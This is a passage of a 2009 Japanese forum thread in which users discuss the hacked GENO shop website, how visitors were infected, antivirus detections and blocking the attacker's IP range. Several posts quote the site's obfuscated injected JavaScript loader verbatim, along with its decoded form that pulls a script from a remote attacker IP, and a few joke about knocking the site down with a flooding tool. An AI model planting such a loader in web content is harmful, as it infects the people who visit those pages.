4月は踏んでないが先月買い物したからなぁ。個人情報が…
648 イヌガラシ(catv?):2009/04/07(火) 05:38:09.63 ID:Q4EIQS5E
>>540
今のところかかったら特効薬は無い。
死を待つか再インストールのみ。

649 ダイアンサス ピンディコラ(アラバマ州):2009/04/07(火) 05:40:35.86 ID:ixYvGGjt
確実にひっかかった。そこまで重くなってもないし、最低限の作業はできるけど
aviraとかセキュリティソフトのアップデートができない。
今カスペインストールして調べてみるところ。あーなにやってるんだろうなこれ。
PC詳しくないからさっっぱりわからん。抜かれて困るようなものは特に無いのが救い・・・
650 セントウソウ(中国地方):2009/04/07(火) 05:55:22.81 ID:OwRG783w
なにか関心の集まることがあると偽情報を流したり危険サイトへ誘導
しようとする奴が即座に現れるようになったな・・・
651 キクザキイチゲ(埼玉県):2009/04/07(火) 06:00:54.25 ID:asBent7A
>>643
俺もそう思う。
652 マンサク(岩手県):2009/04/07(火) 06:13:02.63 ID:a+URb3FB
臨時メンテktkr
653 マンサク(岩手県):2009/04/07(火) 06:14:59.33 ID:a+URb3FB
復帰した
654 サポナリア(愛知県):2009/04/07(火) 06:15:19.64 ID:i6gnM1Fe
コレはサーバーとユーザー両方の穴を狙ってるからね
しかも、
撃ちこむ実行ファイルの内容は簡単に変更できそうだし

詳細が広まってサーバーとユーザー両方で対策されるまで
亜種がゴロゴロ出てくると思うから
GENOに使われたのだけ禁止リストに入れても安心は出来ないだろうな

しかし、GENOの対応は最悪だな
655 ヒヤシンス(東京都):2009/04/07(火) 06:28:57.53 ID:zuWf0lk3
アスキーに教えておこう
656 アルストロメリア(アラバマ州):2009/04/07(火) 06:28:58.77 ID:t0UikMAx
アリアハンでスライム潰してたら、いきなりギガンデスに襲われたようなものだ
657 ミヤコワスレ(山梨県):2009/04/07(火) 06:32:09.42 ID:6piRtb1x
  イ`ヘ
 /: :| ヽ
/ : :/  ヽ ___   _,,,:. .-: :´彡フ
_ノ\_∠: : : : : : : : :`: :-: :,:_:/彡 /
      ( : : : : : : : : : : : : : : `ゝ  /
  悪  r::/: /: : | : : : : : : : : ::\ /
      //: /: : : |: : | |: : |: _: : : :ヽ
  心  {/ 7|`\/i: /|:|/|´: : : : :|ヽ
     〉 ,‐-‐、`|7 || |_::|,_|: : :|:::|: |
  死 / r:oヽ`    /.:oヽヽ: :|: | :|
     {  "ひ)     イびゞ /: :|N
  了  | ヾ:::ソ  ,.   ヾ:::ソ /|: : |
  ! ヽ::::ー-..  ゝ  ..ー-::: ヽ::| r--ッ
-tヽ/´|`::::::::::; ヽ⌒>::::::::::: /: i }  >
::∧: : :|: |      └ ´   /::i: | /_ゝ
. \ヾ: |::|` - ,, ___  _ ,, - ´|: : :|:::|
   ヽ: |::|\     ̄/ /|  |: : :|: |
658 コスミレ(東京都):2009/04/07(火) 06:35:59.08 ID:8y99Mpqc
どこのアンチウイルスメーカーもこの件についてアナウンスしないな。
というか、GENO自体が検体提出をシステム的にやってないのか?
前に雑誌で見たときにはノートンは24時間体性でウイルスを
チェックしてすぐにパターンを出せるって言ってたのに、いまだに
部分的対応しかされてないし、それは他も同じ。
HPのコンフリッカーワームにご注意!ノートンを導入していれば
脅威から守られています。とかアホらしくて涙が出てくる。
659 ヒヤシンス(東京都):2009/04/07(火) 06:39:25.67 ID:zuWf0lk3
いたちごっこになることを望む ラトビア人VSGENO
660 ヒヤシンス(福岡県):2009/04/07(火) 06:40:43.79 ID:pnDf58uK
それっぽいリンクとか踏んだ記憶ないけどこういうの見ると不安になるんだよな
それでスキャン始める
661 ヤマボウシ(catv?):2009/04/07(火) 06:43:59.70 ID:ItJq4Ona BE:268788233-PLT(15151)

昨日余裕だろって思って開いたのだが。
これ感染したかどうかすらわからない。
わかる方法あるん?
662 モモイロヒルザツキミソウ(東京都):2009/04/07(火) 06:44:31.09 ID:5kO5BSyb
まぁ他にも気づいてないだけで、やられてるとこもあるだろうしね
何がしたいのかよく分かてないってのが不気味よね
663 モクレン(石川県):2009/04/07(火) 06:56:32.93 ID:jLm5dvjo
ようやく直ったのか?
664 ヒサカキ(滋賀県):2009/04/07(火) 07:04:13.20 ID:+o0F9ypb
>>608
どこから起動しているかが大事
665 カンパニュラ・アーチェリー(catv?):2009/04/07(火) 07:06:30.85 ID:ogTLMTMU
ただここのサイトが直っても上で言っているように亜種やそのほかのサイトにも拡散していそうだから、
安心は出来ないね。
しかも、決定的な駆除方法が確立されてないから踏んでしまえば、
もはやOS再インストールしか生きる道が残されないし。
666 サトザクラ(関西地方):2009/04/07(火) 07:06:42.93 ID:gVHhPofa
今のRegSeekerは普通に使えると聞いた
ちゃんと旧Ver指定したコピペもあったはず
667 カラスビシャク(長屋):2009/04/07(火) 07:06:49.02 ID:elp42RBI
6
668 クモマグサ(愛媛県):2009/04/07(火) 07:08:28.94 ID:dlqb+X8n
これニュースで流すレベルだろw
誰かしらんがテレビでてるやつのブログもやばい状態だったんだろ?
これPC初心者とかウイルスの事さえ知らんぞw
669 キエビネ(千葉県):2009/04/07(火) 07:15:02.11 ID:EGTFuo2i
>>664
どこからだとヤバいの?
670 ゲンカイツツジ(アラバマ州):2009/04/07(火) 07:17:33.35 ID:Pl73fxil
コマンドプロンプトを立ち上げて
(*´Д`)ハァハァ
をコピペしてEnterすると感染してるかどうかわかるよ
671 コスミレ(東京都):2009/04/07(火) 07:17:57.21 ID:8y99Mpqc
>>664
WINDOWS2000だから誰が起動してるかわからんW
672 ヒサカキ(滋賀県):2009/04/07(火) 07:18:45.09 ID:+o0F9ypb
>>669
窓使いじゃない俺に聞かないでくだしあ><
system32(WINDOWSだっけな)以外
すまん自信ない
673 キエビネ(千葉県):2009/04/07(火) 07:22:30.30 ID:EGTFuo2i
>>672
それはすまんかった
ありがd
674 ハナカイドウ(富山県):2009/04/07(火) 07:27:14.45 ID:SxczGnSN
>>33
>●TrendMicro 8.700.0.1004
> 2009.04.03 PAK_Generic.001
これはVirusTotalなどでの結果だと思うが
「Packerですよ」(圧縮みたいなもの)と言っているだけで
実際は検出しない。要提出。
675 マンサク(岩手県):2009/04/07(火) 07:36:25.94 ID:a+URb3FB
また感染してるじゃねーかww
676 モクレン(石川県):2009/04/07(火) 07:40:37.78 ID:jLm5dvjo
どうなんだ?
まだ踏むとやばいのか?
677 ヒヤシンス(福岡県):2009/04/07(火) 07:42:04.71 ID:pnDf58uK
>>675
なにしたんだよ?
678 センダイハギ(長屋):2009/04/07(火) 07:43:21.33 ID:u9/s023/
>>671
違うタスクマネージャ入れたら見れたような記憶違いのような
プロセスの場所も見れるからそれで確かめるのもあり
679 マンサク(岩手県):2009/04/07(火) 07:45:45.13 ID:a+URb3FB
>>677
さっきまたGENOがウィルス配ってた
680 ミミナグサ(東京都):2009/04/07(火) 07:47:52.70 ID:Xq600thG
特集にアンチウイルスソフトがあるのは泣けるなw
それもページクリックしただけで感染
681 セキチク(関西地方):2009/04/07(火) 07:49:05.24 ID:A+H9NpvZ
くばってたな。妙なJSあったな。
ウイルス復旧。乙
682 モクレン(石川県):2009/04/07(火) 07:50:01.65 ID:jLm5dvjo
マジで!?
直ってないのか?
683 ヒヤシンス(東京都):2009/04/07(火) 07:53:30.79 ID:zuWf0lk3
ターちゃんの中古部屋、オススメするなよw
684 キランソウ(長屋):2009/04/07(火) 07:53:34.40 ID:Z+exZkfv
genoにアクセスしなければいいだけだろうがwwwwwwwww
685 セキチク(関西地方):2009/04/07(火) 07:56:03.05 ID:A+H9NpvZ
オレはチャレンジャーだから常にキャプチャーソフト立ち上げて覗きに行くぜwww
686 ヒヤシンス(東京都):2009/04/07(火) 07:56:31.57 ID:zuWf0lk3
687 クレマチス(埼玉県):2009/04/07(火) 07:57:09.43 ID:dqr+GOkP
GENOの鯖、完全にクラックされてんじゃねーの?w
もしくは、管理権限もってる奴のPC
688 スズナ(アラバマ州):2009/04/07(火) 07:57:55.12 ID:8dbfA7Dm
genoにアクセスしてみたけど特に何も起きない。つまんねー
689 カタクリ(東京都):2009/04/07(火) 07:58:47.66 ID:ZAfsjXT3
AVGの更新はいつしたの?
昨日19時ぐらいに更新してスキャンしたんだが
690 クリサンセコム・ムルチコレ(関西地方):2009/04/07(火) 07:59:23.69 ID:HeZYO5lQ
            (ヽ三/) ))
         __  ( i)))
        /     \ \
      //・\  /・\\ )
    ./::::::  ̄(__人__) ̄::::\
    |    (⌒)\  |    |
    ,┌、-、!.~〈  \_|  _/
    | | | |  __ヽ、   /
    レレ'、ノ‐´   ̄〉  |
    `ー---‐一' ̄
691 トベラ(神奈川県):2009/04/07(火) 08:04:37.84 ID:3DmbuZMk
>>665
流石に大手サイト(大企業や人気サイト)には感染しないだろう?
692 クワガタソウ(コネチカット州):2009/04/07(火) 08:08:21.58 ID:tv2tuZNC
対策としては
avast!とJavaスクリプトOffとAdobeリーダー9が最強なの?
693 コスミレ(東京都):2009/04/07(火) 08:08:54.45 ID:8y99Mpqc
GENOがウイルス仕込まれて3日経つのに
何の対策もしてこないのな。
どうなってんだよ。また仕込まれてんのか?
694 フリージア(東京都):2009/04/07(火) 08:09:42.90 ID:aQV3b+FB
Genoの.jsなんだが
<!--
document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
-->
なんだよこれ、ウィルス復旧してんじゃねぇかw
ファイルを元に戻しただけで、そもそもの外部からの侵入口は開いたままだったのかwww
695 コスミレ(アラバマ州):2009/04/07(火) 08:13:41.76 ID:DQxI7Qh1
ID:aQV3b+FBは良い仕事してるな
696 ナズナ(東京都):2009/04/07(火) 08:13:46.52 ID:hDGCNvVl
損失は計り知れないな。
697 コスミレ(東京都):2009/04/07(火) 08:14:54.94 ID:8y99Mpqc
>>692
それプラス、ラトビアへの接続全て切るのだな。
ルーターかフィルタリングソフトで特定IPアドレス範囲を
切るやつがあるのでそれで切っておけば、GENOウイルスの活動は阻止できる。
オレの環境ではロシア・中国・韓国・台湾・香港・イタリアは元々切ってる。
今回、バルト3国追加した。
698 ヒヤシンス(東京都):2009/04/07(火) 08:15:33.03 ID:zuWf0lk3
>>694に直してもらうといいぞ、糞GENO
699 ねこやなぎ(catv?):2009/04/07(火) 08:15:38.59 ID:u/8Op+t4
ほんとにまた例のアドレスに繋ぎに行くなw
まじ糞だろgeno
700 ロウバイ(千葉県):2009/04/07(火) 08:16:16.08 ID:Wf2gc1i4
ウィルス貼った奴とGenoマジで許さないからな
俺は本気でむかついたから誰か通報して怒っといて
701 コスミレ(アラバマ州):2009/04/07(火) 08:16:43.88 ID:DQxI7Qh1
もう倍王で買うからいいよ
702 コスミレ(東京都):2009/04/07(火) 08:16:54.01 ID:8y99Mpqc
>>694
復帰してやがる。
「むしろワザとやってんじゃねーのか?」
としか思えない。
703 ジョウシュウアズマギク(埼玉県):2009/04/07(火) 08:16:58.85 ID:xUULCnhB
てめえでやれよw
704 セントウソウ(茨城県):2009/04/07(火) 08:18:17.34 ID:ngCPrkrm
>>700
またお前かw
705 セントウソウ(長屋):2009/04/07(火) 08:18:41.28 ID:1sxysAiy
>>700
せめて怒るぐらいはてめぇでしろよw
706 ねこやなぎ(catv?):2009/04/07(火) 08:18:52.90 ID:u/8Op+t4
メンテナンス入ったw
707 オウレン(大阪府):2009/04/07(火) 08:19:24.07 ID:KkHktETZ
祭り中のスレに短縮ウイルス貼ったら
引っかかる奴すさまじいだろうな。
短縮ウイルス貼ったら、貼った奴はどうなるの?
アク禁?
708 ねこやなぎ(catv?):2009/04/07(火) 08:20:03.46 ID:u/8Op+t4
>>707
損害賠償に発展する可能性
709 トベラ(神奈川県):2009/04/07(火) 08:20:59.19 ID:3DmbuZMk
クッキーなんかニコ動とようつべしか許可してません。
710 ハンショウヅル(コネチカット州):2009/04/07(火) 08:20:59.58 ID:tv2tuZNC
>>697
おー!すげー!
そのIPアドレスリスト希望

ラトビアってトラフィック攻撃サイコガンだっけ?
711 ねこやなぎ(catv?):2009/04/07(火) 08:21:07.62 ID:u/8Op+t4
あれ、またアクセスできる・・・。
712 モクレン(石川県):2009/04/07(火) 08:21:22.09 ID:jLm5dvjo
>>707
会社からZIPを落とそうとして引っかかった哀れな人がすでにいたようですが
713 セキチク(関西地方):2009/04/07(火) 08:21:26.14 ID:A+H9NpvZ
JSをOFFにしてても一度食わされたら→現状終了
ナニやってるか現在解らんし比較的新しい穴みたいなので明確な対処方法は不明。

正確な対応は現状お手上げ。GENOがウイルスをどっかに報告してノートン先生なりが対応してくれるまで詳細不明。
そしてそのGENOのサイトで今だ改善されてないのでとっとと閉じとけと。

とりあえずGENOはマトモにIPS運用汁。
714 シラー・カンパヌラータ(愛媛県):2009/04/07(火) 08:21:35.57 ID:9LI1DZp0
p://www.geno.co.jp/xmlrss/07/geno_xml07.js

これの最後とか本当に再発してるな
715 チャボトウジュロ(アラバマ州):2009/04/07(火) 08:22:13.69 ID:KdCp9gHS
Genoさんウイルス復活おめw
716 オキザリス・アデノフィラ(東京都):2009/04/07(火) 08:23:06.84 ID:ZxHViDpi
一応、親のパソコンのAdobe Readerアップデートしておいた
ver.7だったな
717 ドデカテオン メディア(島根県):2009/04/07(火) 08:23:55.64 ID:wl92jsLE
ブルースクリーンってどゆこと
718 ギシギシ:2009/04/07(火) 08:24:48.27 ID:llriVCjF
>>417
俺も送っておいたら返信が来た。
次回更新で対応するみたいだね
719 チリアヤメ(岩手県):2009/04/07(火) 08:24:48.73 ID:2U+6KkTg
>>700
お前はVIPのオレンジ君に通じるものがあるなw
720 ヒサカキ(滋賀県):2009/04/07(火) 08:24:49.29 ID:+o0F9ypb
721 ハンショウヅル(コネチカット州):2009/04/07(火) 08:25:08.64 ID:tv2tuZNC
青い画面
722 セキチク(関西地方):2009/04/07(火) 08:26:20.02 ID:A+H9NpvZ
>>692
現状一度食わされた後はナニやってるかわからんので→終了

GENOがどっかにウイルス検体を提出して対応してもらうまでどーにもならん。
そもそもISPが導入されてるかも若干怪しい気がする。

って事で長引くんじゃないかい?
723 サポナリア(愛知県):2009/04/07(火) 08:26:34.37 ID:i6gnM1Fe
再発してるしPDFファイル名が変わっとる><

対策取れないなら
いいかげんに諦めてWeb閉鎖すれば良いのに
724 ドデカテオン メディア(アラバマ州):2009/04/07(火) 08:26:40.54 ID:zx1Sot1b
>>716
おれはとりあえずしばらくネットは使うなって言っておいたw
725 ハルジオン(コネチカット州):2009/04/07(火) 08:26:57.29 ID:RPctKvVK
GENO「なんか騒いでるのは一部だし〜、特に実被害もないし〜、ぶっちゃけ販売システムが壊れてなければどうでもイイし〜」
726 コスミレ(アラバマ州):2009/04/07(火) 08:28:04.17 ID:DQxI7Qh1
727 デルフィニム(catv?):2009/04/07(火) 08:28:35.18 ID:qY3g5ub0
まだ対応してないの?
728 センダイハギ(catv?):2009/04/07(火) 08:29:23.84 ID:N0gh+ZYS
geno_xmlXX.js また全部改竄されてるなwwwwww
おもしろすぎwwwww
729 ジョウシュウアズマギク(埼玉県):2009/04/07(火) 08:29:37.46 ID:xUULCnhB
なんかもう怖くてサイト気軽に踏めない
とりあえず>>697みたいなアドオンでもないか探してみよ
730 ヒメスミレ(埼玉県):2009/04/07(火) 08:29:51.94 ID:DjsX1FHd
GENOウイルスの名は伊達じゃない
731 リナリア(アラバマ州):2009/04/07(火) 08:29:51.99 ID:Bel+1vHG
PG2導入しようと思ったら、日本語版ダウンできねえw
732 コスミレ(アラバマ州):2009/04/07(火) 08:30:31.17 ID:DQxI7Qh1
ルーターで切っちゃうのが手っ取り早いよね
733 ヒメスミレ(埼玉県):2009/04/07(火) 08:31:12.12 ID:DjsX1FHd
そういやPG2で海外全部弾いてたな…
734 ヒサカキ(滋賀県):2009/04/07(火) 08:31:38.76 ID:+o0F9ypb
>>729
そんなアドオンあるのかw
735 ツボスミレ(福岡県):2009/04/07(火) 08:32:16.62 ID:FKmNytLm
これは意図的にウイルス流してるんじゃね?
736 チャボトウジュロ(アラバマ州):2009/04/07(火) 08:32:18.30 ID:KdCp9gHS
すげーぜgenoさん、ウイルス仕込まれまくってるな
今のとこ検知してるからいいけど新種仕込まれる前に
特攻するのも自重した方がいいか
737 クリサンセコム・ムルチコレ(関西地方):2009/04/07(火) 08:32:30.74 ID:HeZYO5lQ
ネットじゃなくてGENO本店でなんか言ってた?
738 ハンショウヅル(コネチカット州):2009/04/07(火) 08:32:47.44 ID:tv2tuZNC
>>720
英語よくわからんがありがと
>>722
一度も踏んではいないんだが今後踏みそうでコワいわ
739 イワザクラ(西日本):2009/04/07(火) 08:33:40.58 ID:Osz0BGWd
>>524
avast!口ほどにもないな
740 セキチク(関西地方):2009/04/07(火) 08:34:34.78 ID:A+H9NpvZ
とりあえず対策に書かれている

94.247.2.195(94.247.[2-3].[0-255])への接続を遮断

を「ルーター」に設定。クライアントはもう食ってると思ったら諦めてコレをしておくべき。
741 コスミレ(コネチカット州):2009/04/07(火) 08:34:52.82 ID:pj1WzGHX
外付けのHDDも感染する?
742 ドデカテオン メディア(島根県):2009/04/07(火) 08:35:56.83 ID:wl92jsLE
再起動する時いつもと変わらなかったけど
これは感染してないってことだよね?
ちなみにノートン先生でスキャンしても何もなかった
743 ハンショウヅル(コネチカット州):2009/04/07(火) 08:35:57.17 ID:tv2tuZNC
>>730
なんこか前のスレでGENO再度(集団虐殺)て言ってて上手いなあ!と感心した
744 イワウチワ(北海道):2009/04/07(火) 08:36:59.76 ID:5v3kNLyc
もしかして、故意にウイルスを拡散させようとしてるのではないか?
745 コスミレ(東京都):2009/04/07(火) 08:38:27.22 ID:8y99Mpqc
>>710
おれは
http://www.vector.co.jp/soft/dl/winnt/net/se316799.html
これ使って抽出した。
けっこう時間かかるが、1時間もあれば好みのIPリスト作れるはず。
貼ろうと思ったが、長すぎるので断念。
746 クワガタソウ(コネチカット州):2009/04/07(火) 08:39:07.04 ID:tv2tuZNC
サイバーポリスと警視庁とかに通報しといてよ
あとマイクロソフトにも
747 ヒサカキ(滋賀県):2009/04/07(火) 08:39:20.84 ID:+o0F9ypb
>>738
ttp://fedorasrv.com/pppoe-iptables.shtml
参考にどうぞ。これはiptablesで弾く場合だけど。
748 センダイハギ(catv?):2009/04/07(火) 08:39:28.33 ID:N0gh+ZYS
geno_xmlXX.js のタイムスタンプ、4/7 07:57 ?
749 キエビネ(千葉県):2009/04/07(火) 08:39:37.69 ID:EGTFuo2i
94.247.2.195なければ大丈夫ってわけでもない?
750 ヒメスミレ(埼玉県):2009/04/07(火) 08:40:09.34 ID:DjsX1FHd
インディーズバンド†GENO†、カワイソス
751 ハンショウヅル(コネチカット州):2009/04/07(火) 08:40:43.26 ID:tv2tuZNC
>>745
おー!ありがと!
752 クワガタソウ(コネチカット州):2009/04/07(火) 08:41:58.44 ID:tv2tuZNC
>>747
こちらのお方もありがとー!
753 ヒサカキ(滋賀県):2009/04/07(火) 08:42:39.44 ID:+o0F9ypb
>>749
94.247.2.0/23(94.247.2.0〜94.247.3.255)っぽい。
754 ヒヤシンス(東京都):2009/04/07(火) 08:44:03.05 ID:zuWf0lk3
糞会社
導入事例:株式会社GENO 様 システム概要|IT SOLUTION
755 プリムラ・ヒルスタ(関西地方):2009/04/07(火) 08:46:48.32 ID:KYAPlMB5
>>723
マジなら二次被害が出るな。オワタ
756 タツタソウ(福岡県):2009/04/07(火) 08:48:08.12 ID:0EhaQgLq
>>741
データ全消去してから一度フォーマットかけるべき
757 ドデカテオン メディア(島根県):2009/04/07(火) 08:49:17.44 ID:wl92jsLE

>>173専ブラで開こうとして表示されなかったんだけど大丈夫かな
ちなみにノートンでスキャンしたけど特に何も無し
再起動してもいつもと変わらなかった
758 ドデカテオン メディア(catv?):2009/04/07(火) 08:52:00.79 ID:FwthmTsl
>>714
"<script src=//94.247.2.195/jquery.js></script>"

が出力されるようになってるw
759 コスミレ(東京都):2009/04/07(火) 08:52:27.17 ID:8y99Mpqc
>>755
マジかどうかはその目で確かめてくれ www.kakiko.comが怪しいかどうかは
ググって調べてくれ。単にソースを表示するサイトだって分かるはず。

http://www.kakiko.com/check/?url=http%3A%2F%2Fwww.geno.co.jp%2Fmt.js

<!--
document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
-->
760 リナリア(アラバマ州):2009/04/07(火) 08:53:07.32 ID:Bel+1vHG
ウイルスさん更新されたの?
作者というか改変したやつは豆だなあ
761 ヒサカキ(滋賀県):2009/04/07(火) 08:53:52.48 ID:+o0F9ypb
>>757
ソースみたらただのブラクラだからこれといって異常がなければ大丈夫だろ。
不安ならキャッシュを消しておけばいい。
762 ヒヤシンス(福岡県):2009/04/07(火) 08:53:55.53 ID:pnDf58uK
タスクマネージャーみてもそれっぽいのいないしCPU稼働率も10%以下で落ち着いてるし感染してないと見ていいかな
マジで怖いわ
763 ギシギシ:2009/04/07(火) 08:54:54.05 ID:llriVCjF
GENOがまた改竄されてるか
juicyrock.co.jp は大丈夫なのか
764 シナノコザクラ(福岡県):2009/04/07(火) 08:55:12.82 ID:se8lpk3k
>>757
Avastだと画像キャッシュにトロイが検出される
765 ドデカテオン メディア(島根県):2009/04/07(火) 08:56:27.23 ID:wl92jsLE
>>761
くだらん質問に答えてくれてマジサンクス
安心したわ
766 ドデカテオン メディア(catv?):2009/04/07(火) 08:58:01.18 ID:FwthmTsl
94.247.2.195 = hs.2-195.zlkon.lv

.lv = ラトビア

ラトビア
http://ja.wikipedia.org/wiki/%E3%83%A9%E3%83%88%E3%83%93%E3%82%A2

※ 単なる踏み台かも知れない。
767 コスミレ(東京都):2009/04/07(火) 08:58:38.96 ID:8y99Mpqc
>>760
暗号化方式前と違うなw
多分、botか何かだと思うけども、ファイル名と
スクリプトを毎回変えてくる辺り、定石を踏まえてるね。
768 マーガレット(長屋):2009/04/07(火) 08:58:56.39 ID:Ia/hXGSo
げの見に行ったら本当にファイル名変わっててワロタ
769 コスミレ(東京都):2009/04/07(火) 09:00:01.29 ID:8y99Mpqc
誰かメールで教えてやれよ。こんなの撒き散らされたら
たまったもんじゃねーよ。なんだよこれ。
770 水芭蕉(catv?):2009/04/07(火) 09:00:11.44 ID:V8qbV/8E
>>766
シナの踏み台と見てるが
771 チューリップ(東京都):2009/04/07(火) 09:02:39.53 ID:14WqtCZK
これはもうだめかもしれんね。
772 コスミレ(東京都):2009/04/07(火) 09:02:45.11 ID:8y99Mpqc
お、いまさっき、
://XXX.geno.co.jp/xmlrss/07/geno_xml07.js
のウイルスコード消えたwww

GENOの中の人?見てますか?
やってもまたウイルスで更新されちゃうんだから、
侵入経路判明するまでサイト閉鎖しろ。
これは心からのアドバイス。
773 ドデカテオン メディア(catv?):2009/04/07(火) 09:05:45.26 ID:FwthmTsl
p://94.247.2.195/jquery.js が更新された時間↓ PCの時計合わせてないのかな??
Last-Modified: Tue, 24 Feb 2009 15:56:18 GMT

GENOはもうダメだろうな。 危機管理体制が終わってる。
774 ゲンカイツツジ(愛媛県):2009/04/07(火) 09:05:56.64 ID:DBTEEc7y
まさにいたちごっこ
775 タツナミソウ(catv?):2009/04/07(火) 09:06:03.06 ID:PlJLuSEz
>>772
GENOにセキュリティー担当で雇ってもらえよ
776 プリムラ・マラコイデス(長屋):2009/04/07(火) 09:06:28.15 ID:KHveeOxY
いっそ田代砲で落してあげたほうが、武士の情けのような気がしてきた
777 ヤエヤマブキ(大阪府):2009/04/07(火) 09:07:26.20 ID:95PGP/4e BE:1680151777-2BP(1122)

>>719
ワロタwwww

あいつもウイルスで自爆したんだよな
778 ミツマタ(アラビア):2009/04/07(火) 09:08:24.55 ID:qT0OJ6EK
>>771
× これはもうだめかもしれんね。
○ これはだめかもわからんね。

機長にあやまれ
779 ドデカテオン メディア(catv?):2009/04/07(火) 09:08:35.95 ID:FwthmTsl
しかしよく出来たスクリプトだな。 これ書いてるやつはjsを完璧に使いこなしてるわ。
780 シロウマアサツキ(埼玉県):2009/04/07(火) 09:09:30.37 ID:uUJ7vfAt
cyberpolice.go.jpにお願いして強制的にサイト閉鎖してもらうしかないな
やつらこのまま営業続ける気だろ
781 ホトケノザ(catv?):2009/04/07(火) 09:09:48.81 ID:gCb0mYyK
国内中古リユースが高まるとおいしくない諸外国の仕業
782 ドデカテオン メディア(島根県):2009/04/07(火) 09:09:57.97 ID:wl92jsLE
>>764
そのavastてのを使えばいいの?
783 サルトリイバラ(長屋):2009/04/07(火) 09:10:48.21 ID:MUCgQdwG
GENO閉鎖できません!!
784 コスミレ(東京都):2009/04/07(火) 09:11:12.11 ID:8y99Mpqc
>>780
このままウイルス感染→ファイル上書きってアホみたいなことを
これから何年も続けるかもしれん。
785 バイカカラマツ(catv?):2009/04/07(火) 09:11:33.38 ID:GRlC9SeH
あのipaに報告しておきましたよ
786 コスミレ(東京都):2009/04/07(火) 09:12:08.27 ID:8y99Mpqc
>>785
あいつらロリポル落とすのが本命の連中だから
どうにもならんだろ。
787 シデ(長屋):2009/04/07(火) 09:12:25.05 ID:djLpucqQ
やべえノートン先生期限切れで脂肪中だ
不安だし金払うか…
788 オダマキ(アラバマ州):2009/04/07(火) 09:12:34.71 ID:RVO46BVa
>>780
冗談抜きでやってもらうしかない
危機感がなさ過ぎるっつーか有耶無耶にしようとしてる節がある
789 アカシデ(北海道):2009/04/07(火) 09:13:19.52 ID:4EvXsRvm
田代砲で潰すか
790 カントウタンポポ(関東・甲信越):2009/04/07(火) 09:13:20.08 ID:2iC5vGDl
助けて!ネッポポリス!
791 ビオラ(埼玉県):2009/04/07(火) 09:13:26.52 ID:lAXM+gVu
>>754
その会社がサーバーごと管理してるんかいな
792 ハンショウヅル(コネチカット州):2009/04/07(火) 09:13:37.00 ID:tv2tuZNC
>>782
avast!
Adobeリーダーインストールしてるなら9にアップデート
Javaスクリプトonにしてるならoff
ラトビアをブロック

ほかはこのスレを参照
793 バーベナ(東京都):2009/04/07(火) 09:14:23.31 ID:QcOzRQPX
「GENOざまぁwww」的な発言が目に付くんですけど
このショップって嫌われてる?
794 ドデカテオン メディア(島根県):2009/04/07(火) 09:14:32.90 ID:wl92jsLE
ますます訳わかんねww
再起動しても大丈夫だったし
このまま放置するわ
795 コスミレ(東京都):2009/04/07(火) 09:14:48.22 ID:8y99Mpqc
avast!avast!avast!
って、「!」を製品名につけるとこっぱずかしいなw
796 ハナイバナ(アラバマ州):2009/04/07(火) 09:15:30.95 ID:Z6UrgVbS
>>769
GENOは昔っからメールガン無視でつよ
797 イワウチワ(北海道):2009/04/07(火) 09:15:31.12 ID:5v3kNLyc
>>787
http://pc11.2ch.net/test/read.cgi/sec/1227794006/
お好きな体験版をインスコ汁
798 スィートアリッサム(北海道):2009/04/07(火) 09:15:44.45 ID:FLBx63e7
随分続くなこのスレ
被害者多いの?
799 ドデカテオン メディア(catv?):2009/04/07(火) 09:15:50.54 ID:FwthmTsl
>>794
タスクマネージャ起動してsvchost.exeがあったら気を付けろ。
800 ニリンソウ(愛知県):2009/04/07(火) 09:15:58.19 ID:HIPtm1rI
>>793
俺は嫌い
自作系の板とかでしつこく宣伝してくるから
801 アルストロメリア(アラバマ州):2009/04/07(火) 09:16:05.75 ID:t0UikMAx
メンテはじめたよ
802 イワザクラ(西日本):2009/04/07(火) 09:16:21.01 ID:Osz0BGWd
524 : シンフィアンドラ・ザンゼグラ(アラバマ州):2009/04/07(火) 02:37:04.72 ID:aXhN0DBC
踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。
IEのテンポラリに残ってた。
jquery[1].js 感染:Trojan-Downloader.JS.Agent.dwf
A0G6M8XZ\Vy[1].pdf 感染:Exploit.Win32.Pidief.aog

Avast!は最新版でも、このファイルを検出しなかった。
Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。
どなたかの参考になれば幸い。

avast!最強伝説は終焉した
803 ユキノシタ(dion軍):2009/04/07(火) 09:16:29.05 ID:HaGniD7M
>>795
すごいよ!!マサルさんみたいな感じか
804 オダマキ(アラバマ州):2009/04/07(火) 09:16:34.34 ID:RVO46BVa
>>798
ネタ元が続行中なのに続かないわけがないと思うんだ
805 クワガタソウ(コネチカット州):2009/04/07(火) 09:17:21.40 ID:tv2tuZNC
>>795
たしかに…w
あの警告音が!←に値する
806 サトザクラ(東京都):2009/04/07(火) 09:17:40.07 ID:YJ0acd5U
まだ閉鎖できないのか
807 サンシュ(神奈川県):2009/04/07(火) 09:20:55.40 ID:1n2t/ThP
>>805
あれはマジで心臓に悪い
入れたら速攻サウンドオフw
808 ドデカテオン メディア(島根県):2009/04/07(火) 09:21:10.34 ID:wl92jsLE
>>799
あったよ
809 シデ(長屋):2009/04/07(火) 09:21:17.71 ID:djLpucqQ
とりあえずfoxit更新してきた
怪しいURLは踏んでないしこのウィルス知ってからスクリプト切ってるし
特に挙動も怪しくないから大丈夫だと思いたい

しかしノートン死亡
マカフィー嫌いだけど一括で入ってるし利用しようかねえ
810 クロッカス(東日本):2009/04/07(火) 09:21:55.72 ID:v2pFr5JY
>>802
Avast!は接続をさせないのだwww
811 アグロステンマ アゲラタム(アラバマ州):2009/04/07(火) 09:22:37.10 ID:F3zLYXU/
avast昨晩うpされたexeには無反応なんだし過信は禁物じゃないか
812 モクレン(石川県):2009/04/07(火) 09:23:21.66 ID:jLm5dvjo
ぷいーんぷいーん
813 イワザクラ(西日本):2009/04/07(火) 09:24:13.62 ID:Osz0BGWd
所詮は無料だしな
